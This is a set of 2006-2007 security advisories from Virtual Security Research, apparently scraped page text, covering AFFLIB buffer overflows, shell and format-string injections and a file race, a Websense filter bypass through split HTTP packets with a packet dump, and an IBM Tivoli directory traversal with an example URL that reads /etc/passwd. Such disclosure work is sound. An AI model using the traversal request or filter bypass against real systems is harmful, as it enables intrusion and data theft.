untrustworthy parameter is used without length checking in a strcpy() call which writes to a stack-based buffer. If this command receives parameters from an untrusted source, code execution would be a major risk. Lines 402-412 are included below for illustration: while ((dp = readdir(dirp)) != NULL){ if (last4_is_aff(dp-d_name)){ char path[MAXPATHLEN+1]; strcpy(path,af-fname); strlcat(path,/,sizeof(path)); strlcat(path,dp-d_name,sizeof(path)); if(afd_add_file(af,path)){ return -1; } } } The overflow would occur if a value for af-fname were specified by a user which was larger than 1025 bytes. This is certainly plausible, since many systems allow pathnames to be as large as 4096 bytes. As this is part of the core AFFLIB(TM), it could be exploited in 3rd party programs which include AFFLIB(TM) support, if an attacker were allowed to specify filenames. In addition, it could be exploited if any AFFLIB(TM) binary were setuid/setgid, or if these programs were executed from a CGI script or similar remote connection. * Stack-based Buffer Overflow in aimage Input File Name * File: aimage/aimage.cpp Line: 554 Description: A command line parameter is used without length checking in a sprintf() call, which writes to a stack-based buffer. If this command (or this function) receives parameters from an untrusted source, code execution would be a major risk. Lines 548-554 are included for illustration: int getlock(class imager *im) { /* If the file exists and the PID in the file is running, * can't get the lock. */ char lockfile[MAXPATHLEN]; sprintf(lockfile,/tmp/aimge.%s.lock,im-infile); An attacker could exploit this problem if the aimage binary were setuid/setgid, or if the aimage program were executed in a CGI script or something similar. Vendor Response: Simson Garfinkel was first contacted on 2007-03-31. The following timeline outlines the responses from the vendor regarding this issue: 2007-04-01 - Vendor provided details of all vulnerabilities identified. 2007-04-03 - Continued vendor communication. 2007-04-05 - Vendor released version 2.2.6, containing multiple security fixes. 2007-04-06 - Vendor notified VSR that fixes were released. 2007-04-09 - VSR notified vendor that 9 vulnerability instances still remained in latest release. 2007-04-12 - Vendor confirmed that remaining vulnerabilities would be fixed in next release. 2007-04-25 - Vendor released versions 2.2.7 and 2.2.8. Vendor did not notify VSR. 2007-04-27 - VSR discovered new versions were released. VSR inspected version 2.2.8 and found that no additional vulnerabilities were fixed. VSR advisories published. Recommendation: AFFLIB(TM) users should upgrade to the newest version. Third-party projects which rely on AFFLIB(TM) should encourage users to upgrade, and/or incorporate fixes into their distribution of the library. The update is available via: http://www.afflib.org/downloads/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Common Vulnerabilities and Exposures (CVE) Information: The Common
AFFLIB(TM): Multiple Shell Metacharacter Injections
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Multiple Shell Metacharacter Injections in AFFLIB Release Date: 2007-04-27 Application: AFFLIB(TM) Versions: 2.2.0-2.2.8 and likely earlier versions Severity: Medium to Low Author: Timothy D. Morgan tmorgan {at} vsecurity {dot} com Vendor Status: Vendor Notified CVE Candidate: CVE-2007-2055 Reference: http://www.vsecurity.com/bulletins/advisories/2007/afflib-shellinject.txt - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description: From the forensicswiki.org website[1]: The Advanced Forensics Format (AFF) is an extensible open format for the storage of disk images and related forensic metadata. It was developed by Simson Garfinkel and Basis Technology. AFFLIB(TM) is the reference implementation of the AFF(TM) format, written primarily by Simson Garfinkel. It comes in the form of an open source library and a set of command line tools used to manipulate AFF(TM) files. Vulnerability Overview: In mid-March, 2007 Virtual Security Research, LLC (VSR) performed a security code review of AFFLIB(TM) as a part of an internal tool assessment process. As a result, multiple vulnerabilities of varying severities were discovered. The most significant of these vulnerabilities are being announced publicly to raise awareness and help end-users secure themselves against potential attack. VSR found that user-supplied command line parameters were used in several popen() calls without validation or escaping. The attack vectors available are limited, which reduces the overall severity of these problems. These vulnerabilities remain exploitable in the latest release (2.2.8), even though an attempt was made to check for a set of shell metacharacters. All line numbers listed below are from version 2.2.0. Vulnerability Details: The following sections include detailed descriptions of the specific instances of shell metacharacter injection found during the assessment. * Shell Command Injections in Decompression Calls * File: tools/afconvert.cpp Lines: 245 255 Platforms Affected: Unix Description: A command line parameter is used without validation or escaping in a popen() call. If this command (or this function) receives parameters from an untrusted source, code execution would be a major risk. Lines 240-257 are included below for illustration: /* Check to see if it is a gzip file... */ if(probe_gzip(infile) yesno(infile looks like a gzip file,Uncompress it,Uncompressing)){ /* Open with a subprocess. We will need to use zlib when we move to Windows. */ char buf[256]; sprintf(buf,gzcat %s,infile); a_in = af_popen(buf,r); } /* Check to see if it is a bzip2 file... */ if(!a_in probe_bzip2(infile) yesno(infile looks like a bzip2 file,Uncompress it,Uncompressing)){ /* Open with a subprocess. We will need to use bzip2zlib when we move to Windows. */ char buf[256]; sprintf(buf,bzcat %s,infile); a_in = af_popen(buf,r); } char buf[256]; sprintf(buf,gzcat %s,infile); a_in = af_popen(buf,r); Since af_popen() ultimately uses the popen() system call, and infile comes directly from a command line parameter, command line special characters could be injected if an attacker could control the input. * Shell Command Injection in Unused get_parameter Function * File: aimage/ident.cpp Line: 190 Platforms Affected: Unix Description: A function parameter is used without validation or escaping in a popen() call. If this function (get_parameter) received arguments from an untrusted source, code execution would be a major risk. This function does not appear to be called at this time. Vendor Response: Simson Garfinkel was first contacted on 2007-03-31. The following timeline outlines the responses from the vendor regarding this issue: 2007-04-01 - Vendor provided details of all vulnerabilities identified. 2007-04-03 - Continued vendor communication. 2007-04-05 - Vendor released version 2.2.6, containing multiple security fixes. 2007-04-06 - Vendor notified VSR that fixes were released. 2007-04-09 - VSR notified vendor that 9 vulnerability instances still remained in latest release. 2007-04-12 - Vendor confirmed that remaining vulnerabilities would be fixed in next release. 2007-04-25 - Vendor released versions 2.2.7 and 2.2.8. Vendor did not notify VSR. 2007-04-27 - VSR discovered new versions were released. VSR inspected version 2.2.8 and found that no additional vulnerabilities were fixed. VSR advisories published
AFFLIB(TM): Time-of-Check-Time-of-Use File Race
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Time-of-Check-Time-of-Use File Race in AFFLIB Release Date: 2007-04-27 Application: AFFLIB(TM) Versions: 2.2.0-2.2.8 and likely earlier versions. Severity: Low Author: Timothy D. Morgan tmorgan {at} vsecurity {dot} com Vendor Status: Vendor Notified CVE Candidate: CVE-2007-2056 Reference: http://www.vsecurity.com/bulletins/advisories/2007/afflib-toctou.txt - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description: From the forensicswiki.org website[1]: The Advanced Forensics Format (AFF) is an extensible open format for the storage of disk images and related forensic metadata. It was developed by Simson Garfinkel and Basis Technology. AFFLIB(TM) is the reference implementation of the AFF(TM) format, written primarily by Simson Garfinkel. It comes in the form of an open source library and a set of command line tools used to manipulate AFF(TM) files. Vulnerability Overview: In mid-March, 2007 Virtual Security Research, LLC (VSR) performed a security code review of AFFLIB(TM) as a part of an internal tool assessment process. As a result, multiple vulnerabilities of varying severities were discovered. The most significant of these vulnerabilities are being announced publicly to raise awareness and help end-users secure themselves against potential attack. A time-of-check-time-of-use race was discovered in AFFLIB(TM) which could allow an attacker on the local machine to overwrite an arbitrary file. Because the content of the file would not be controllable by an attacker, it is unlikely that this is vulnerability is exploitable for more than a denial-of-service. This vulnerability remains in the latest version (2.2.8) despite several notifications to the vendor. All line numbers listed below are from version 2.2.0. Vulnerability Details: File: aimage/aimage.cpp Lines: 554-575 Platforms Affected: Unix Description: A mostly predictable name for the lockfile as it is created under /tmp. An access check is first performed, and later the file is opened, truncating if it already exists. Since the time of check and time of use are not the same, a filesystem race could be exploited by a local attacker through the use of a symlink. Lines 548-582 are included below to illustrate the problem: int getlock(class imager *im) { /* If the file exists and the PID in the file is running, * can't get the lock. */ char lockfile[MAXPATHLEN]; sprintf(lockfile,/tmp/aimge.%s.lock,im-infile); if(access(lockfile,F_OK)==0){ /* Lockfile exists. Get it's pid */ char buf[1024]; FILE *f = fopen(lockfile,r); if(!f){ perror(lockfile); // can't read lockfile... return -1; } fgets(buf,sizeof(buf),f); buf[sizeof(buf)-1] = 0; int pid = atoi(buf); if(checkpid(pid)==0){ /* PID is not running; we can delete the lockfile */ if(unlink(lockfile)){ err(1,could not delete lockfile %s: ,lockfile); } } /* PID is running; generate error */ errx(1,%s is locked by process %d\n,im-infile,pid); } FILE *f = fopen(lockfile,w); if(!f){ err(1,lockfile); } fprintf(f,%d\n,getpid()); // save our PID. fclose(f); return 0; } This is likely only exploitable for a denial-of-service condition, since the attacker would have little control over the content being written (the process ID of aimage). Vendor Response: Simson Garfinkel was first contacted on 2007-03-31. The following timeline outlines the responses from the vendor regarding this issue: 2007-04-01 - Vendor provided details of all vulnerabilities identified. 2007-04-03 - Continued vendor communication. 2007-04-05 - Vendor released version 2.2.6, containing multiple security fixes. 2007-04-06 - Vendor notified VSR that fixes were released. 2007-04-09 - VSR notified vendor that 9 vulnerability instances still remained in latest release. 2007-04-12 - Vendor confirmed that remaining vulnerabilities would be fixed in next release. 2007-04-25 - Vendor released versions 2.2.7 and 2.2.8. Vendor did not notify VSR. 2007-04-27 - VSR discovered new versions were released. VSR inspected version 2.2.8 and found that no additional vulnerabilities were fixed. VSR advisories published. Recommendation: AFFLIB(TM) users should upgrade to the newest version. Third-party
AFFLIB(TM): Multiple Format String Injections
){ /* PID is not running; we can delete the lockfile */ if(unlink(lockfile)){ err(1,could not delete lockfile %s: ,lockfile); } } /* PID is running; generate error */ errx(1,%s is locked by process %d\n,im-infile,pid); } FILE *f = fopen(lockfile,w); if(!f){ err(1,lockfile); Since the im-infile value could be specified by a user, the lockfile string could contain format string characters. An attacker could exploit this problem if the aimage binary were setuid/setgid, or if the aimage program were executed in a CGI script or something similar. * Format String Injection in imager * File: aimage/imager.cpp Line: 265 Description: A command line parameter is used as the format string in the err() call. If an attacker could control this name, a format string injection vulnerability could be exploited. * Format String Injection in afxml * File: tools/afxml.cpp Line: 101 Description: A command line parameter is used as the format string in the err() call. If an attacker could control this name, a format string injection vulnerability could be exploited. Vendor Response: Simson Garfinkel was first contacted on 2007-03-31. The following timeline outlines the responses from the vendor regarding this issue: 2007-04-01 - Vendor provided details of all vulnerabilities identified. 2007-04-03 - Continued vendor communication. 2007-04-05 - Vendor released version 2.2.6, containing multiple security fixes. 2007-04-06 - Vendor notified VSR that fixes were released. 2007-04-09 - VSR notified vendor that 9 vulnerability instances still remained in latest release. 2007-04-12 - Vendor confirmed that remaining vulnerabilities would be fixed in next release. 2007-04-25 - Vendor released versions 2.2.7 and 2.2.8. Vendor did not notify VSR. 2007-04-27 - VSR discovered new versions were released. VSR inspected version 2.2.8 and found that no additional vulnerabilities were fixed. VSR advisories published. Recommendation: AFFLIB(TM) users should upgrade to the newest version. Third-party projects which rely on AFFLIB(TM) should encourage users to upgrade, and/or incorporate fixes into their distribution of the library. The update is available via: http://www.afflib.org/downloads/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Common Vulnerabilities and Exposures (CVE) Information: The Common Vulnerabilities and Exposures (CVE) project has assigned the following name to these issues. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. CVE-2007-2054 - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- References: 1. AFF - Forensics Wiki http://www.forensicswiki.org/wiki/AFF - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- This advisory is distributed for educational purposes only, and comes with absolutely NO WARRANTY; not even the implied warranty of merchantability or fitness for a particular purpose. Virtual Security Research, LLC nor the author accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Vulnerability Disclosure Policy: http://www.vsecurity.com/disclosurepolicy.html - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- AFF(TM) and AFFLIB(TM) are trademarks of Simson Garfinkel and Basis Technology Corp. Included source code excerpts are copyright Simson Garfinkel and Basis Technology Corp. This advisory is copyright (C) 2007 Virtual Security Research, LLC. All rights reserved. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGMjSCQ1RSUNR+T+gRAtFVAJ4+d7NZBSefuHg1IoHtBb6RnPA2aACeJ6p3 SojDUxCo8X43cOE0XXZcxXo= =W+7Y -END PGP SIGNATURE-
VSR Advisory: WebSense content filter bypass when deployed in conjunction with Cisco filtering devices
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: WebSense content filter bypass when deployed in conjunction with Cisco filtering devices Release Date: 2006-05-08 Application: Websense in Conjunction with Cisco PIX Version: Websense 5.5.2 Cisco PIX OS / ASA 7.0.4.12 Cisco PIX OS 6.3.5(112) FWSM 2.3.x FWSM 3.x (other versions untested) Severity: Low Author: George D. Gal ggal_at_vsecurity.com Vendor Status: Vendor Notified, Fix Available CVE Candidate: CVE-2006-0515 Reference: http://www.vsecurity.com/bulletins/advisories/2006/cisco-websense-bypass.txt - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description: From the WebSense website[1]: Websense Enterprise, the industry-leading web filtering solution, improves employee productivity, reduces legal liability, and optimizes the use of IT resources. Websense Enterprise integrates seamlessly with leading network infrastructure products to offer unequaled flexibility and control. Vulnerability Overview: On August 9th, 2005 VSR has identified the ability to bypass the Websense URL filtering capabilities when used in conjunction with the Cisco PIX for web content filtering. Shortly thereafter another security researcher [sledge.hammer(a+t)sinhack.net] had published[2] a proof-of-concept for evading the URL filtering performed by Websense claiming that Websense has failed to address the issue. However, the vulnerability has been verified by Cisco as a problem which relies within its handling of filtered requests. Vulnerability Details: The vulnerability exists primarily due to the manner in which Cisco PIX and other Cisco filtering devices handle split packets in conjunction with Websense Enterprise integration. For each HTTP request the Cisco PIX or other Cisco device forwards individual packets to Websense to determine whether or not the request should be permitted. However, when splitting the HTTP request into two or more packets on the HTTP method it is possible to circumvent the filtering mechanism. Additionally, requests using this fragmented approach do not appear to be logged within Websense indicating that the request is never sent to Websense for policy inspection. The simplest form required to exploit this vulnerability is to fragment the first character of the HTTP request, followed by a single TCP packet for subsequent data (e.g. setting the PSH flag on the individual packets). Virtual Security Research has created a utility[3] to demonstrate the ability to bypass Websense filtering for the affected versions of Cisco filtering devices enumerated in this advisory header. You may download and run this utility at your own risk from: http://www.vsecurity.com/tools/WebsenseBypassProxy.java The following Snort output demonstrates the fragmented request capable of bypassing Websense: - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 11/04-10:06:36.260991 0:B:DB:DE:19:87 - 0:0:C:7:AC:5 type:0x800 len:0x43 10.254.5.113:58034 - 82.165.25.125:80 TCP TTL:64 TOS:0x0 ID:1534 IpLen:20 DgmLen:53 DF ***AP*** Seq: 0xF5B80F51 Ack: 0x21D6E47 Win: 0x8040 TcpLen: 32 TCP Options (3) = NOP NOP TS: 148674 160066961 47 G =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/04-10:06:36.359288 0:30:7B:93:19:4C - 0:B:DB:DE:19:87 type:0x800 len:0x42 82.165.25.125:80 - 10.254.5.113:58034 TCP TTL:49 TOS:0x0 ID:36972 IpLen:20 DgmLen:52 DF ***A Seq: 0x21D6E47 Ack: 0xF5B80F52 Win: 0x16A0 TcpLen: 32 TCP Options (3) = NOP NOP TS: 160066973 148674 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/04-10:06:36.359387 0:B:DB:DE:19:87 - 0:0:C:7:AC:5 type:0x800 len:0x185 10.254.5.113:58034 - 82.165.25.125:80 TCP TTL:64 TOS:0x0 ID:1535 IpLen:20 DgmLen:375 DF ***AP*** Seq: 0xF5B80F52 Ack: 0x21D6E47 Win: 0x8040 TcpLen: 32 TCP Options (3) = NOP NOP TS: 148683 160066973 45 54 20 2F 66 61 76 69 63 6F 6E 2E 69 63 6F 20 ET /favicon.ico 48 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 HTTP/1.1..Host: 77 77 77 2E 70 68 72 61 63 6B 2E 6F 72 67 0D 0A www.phrack.org.. 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 User-Agent: Mozi 6C 6C 61 2F 35 2E 30 20 28 58 31 31 3B 20 55 3B lla/5.0 (X11; U; 20 46 72 65 65 42 53 44 20 69 33 38 36 3B 20 65 FreeBSD i386; e 6E 2D 55 53 3B 20 72 76 3A 31 2E 37 2E 39 29 20 n-US; rv:1.7.9) 47 65 63 6B 6F 2F 32 30 30 35 30 37 31 38 20 46 Gecko/20050718 F 69 72 65 66 6F 78 2F 31 2E 30 2E 35 0D 0A 41 63 irefox/1.0.5..Ac 63 65 70 74 3A 20 69 6D 61 67 65 2F 70 6E 67 2C cept: image/png, 2A 2F 2A 3B 71 3D 30 2E
VSR Advisory: IBM Tivoli Access Manager - Web Server Plug-in File Retrieval Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Remote Directory Traversal and File Retrieval Release Date: 2006-02-03 Application: IBM Tivoli Access Manager Version: 5.1.0.10, 6.0.0 (other versions untested) Severity: High Author: Timothy D. Morgan [EMAIL PROTECTED] Vendor Status: Vendor Notified, Fix Available CVE Candidate: CVE-2006-0513 Reference: http://www.vsecurity.com/bulletins/advisories/2006/tam-file-retrieval.txt - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description: From IBM's Website[1][2]: IBM Tivoli Access Manager for e-business is an award winning, policy-based access control solution for e-business and enterprise applications that is in the leader quadrant of Gartner's Magic Quadrant. Tivoli Access Manager for e-business can help you manage growth and complexity, control escalating management costs and address the difficulties of implementing security policies across a wide range of Web and application resources. Tivoli Access Manager Plug-in for Web Servers enforces a high degree of security in a secure domain by requiring each client to provide proof of identity. Comprehensive network security can be provided by having Tivoli Access Manager Plug-in for Web Servers control the authentication and authorization of clients. Vulnerability Overview: On December 1st, while conducting a penetration test of a TAM enabled web application, VSR identified a vulnerability in Tivoli Web Server Plug-in which is a component of Tivoli Access Manager (TAM). This flaw allows an authenticated attacker to retrieve files (which reside outside of the web root) from the web server on which the plug-in resides. It is possible to retrieve any file or list any directory which is readable by the web server software. Vulnerability Details: IBM's TAM Plug-in contains a logout handler under the root web path named `pkmslogout'. This handler is designed to log out authenticated users. The handler's display template can be specified by the `filename' request parameter. The value of this parameter is intended to be the partial path to a file on the web server which contains the page template. This file path is vulnerable to directory traversal, and can be used to retrieve nearly arbitrary files from the web server hosting the TAM Plug-in. For instance, if a vulnerable plug-in existed on the system tam.example.com, one could exploit the problem by hitting a URL such as: http://tam.example.com/pkmslogout?filename=../../../../../../../etc/passwd It appears this problem can only be triggered when the attacker is already authenticated through the Web Plug-in. Vendor Response: IBM was first notified on 2005-12-05. Initial response was received on 2005-12-06. A patch for this issue was released (For versions 5.1.0) on 2006-01-18 and was published as a Limited availability fix: 5.1.0-TIV-WPI-LA0016. A generally available fix pack for version 5.1.0 and 6.0 was released by the vendor on 2006-02-03 and available as: Fixpack 5.1.0-TIV-WPI-FP0017 is available at: http://www-1.ibm.com/support/docview.wss?uid=swg24011562 Fixpack 6.0.0-TIV-WPI-FP0001 is available at: http://www-1.ibm.com/support/docview.wss?uid=swg24011561 Recommendation: Apply the relevant fix packs available from IBM. - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Common Vulnerabilities and Exposures (CVE) Information: The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. CVE-2006-0513 - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- References: 1. IBM Tivoli Access Manager for e-business - Product overview http://www-306.ibm.com/software/tivoli/products/access-mgr-e-bus/ 2. IBM Tivoli Access Manager Plug-in for Web Servers Authentication http://publib.boulder.ibm.com/infocenter/tivihelp/v2r1/topic/com.ibm.itame2.doc_5.1/am51_webservers_guide26.htm - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Greetings to: Hotsauce, Beans, and Cornbread - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Copyright 2006 Virtual Security Research, LLC. All rights reserved. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (Darwin) iD8DBQFD4+rATY6Rj3GeBOoRAi+eAJ43hbN4SCozKwEVi7q9UVWjtSTe+gCglrwN BjxuwG+YiPsBpIQfA0CYM6k= =GGKM -END PGP SIGNATURE-